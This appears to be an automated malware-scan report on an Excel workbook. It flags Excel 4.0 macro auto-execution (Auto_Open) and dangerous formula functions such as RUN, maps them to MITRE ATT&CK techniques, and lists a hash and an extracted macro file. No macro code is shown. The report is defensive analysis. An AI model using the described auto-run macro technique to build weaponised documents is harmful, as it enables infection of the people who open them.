MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains Excel 4.0 macros, specifically an Auto_Open entry, which is a known technique for executing malicious code upon opening the document. The heuristics indicate the use of dangerous functions like RUN, suggesting the macro is designed to download and execute a secondary payload. No specific family could be identified, and the macro content is truncated, limiting further analysis.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129578 bytes |

SHA-256: 3f21f2e11f8f51f8d04c56f2545bf555052af40335f89015042d38fc00d549f5

Preview script: first 1,000 lines of the extracted script